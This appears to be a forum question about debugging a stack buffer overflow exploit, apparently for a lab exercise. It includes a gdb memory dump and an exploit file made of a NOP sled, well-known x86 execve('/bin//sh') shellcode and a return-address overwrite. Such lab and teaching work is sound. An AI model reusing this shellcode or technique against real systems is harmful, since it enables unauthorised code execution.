I am doing a buffer overflow exploit and am trying to overwrite the return address 0x08048944 and point it towards my shellcode, which starts next to the address 0xffffda30.
0xffffda30: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xffffda40: 0x99e18953 0x80cd0bb0 0x90909090 0x90909090
0xffffda50: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffda60: 0xffffd760 0x000002fc 0x0804b410 0x00000304
0xffffda70: 0xf7fbdd60 0xffffdad0 0xffffdab8 0x08048944
The buffer itself is at the address 0xffffd760, after 0xffffda60. However, I am unable to overwrite it without receiving a segmentation fault. Below is my exploit file, which is a bunch of NOPs. I convert the file to binary using a Python converter script so that I can feed the badfile into gdb. I have tried just copying the address of the buffer and the 3 addresses following it into my exploit file, so that the area remains unchanged, and then adding more NOPs afterwards until I reached the return address, but it still results in a segmentation fault.
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
31c050682f2f7368682f62696e89e3505389e199b00bcd80
90909090909090909090909090909090
60d7ffff9090909090909090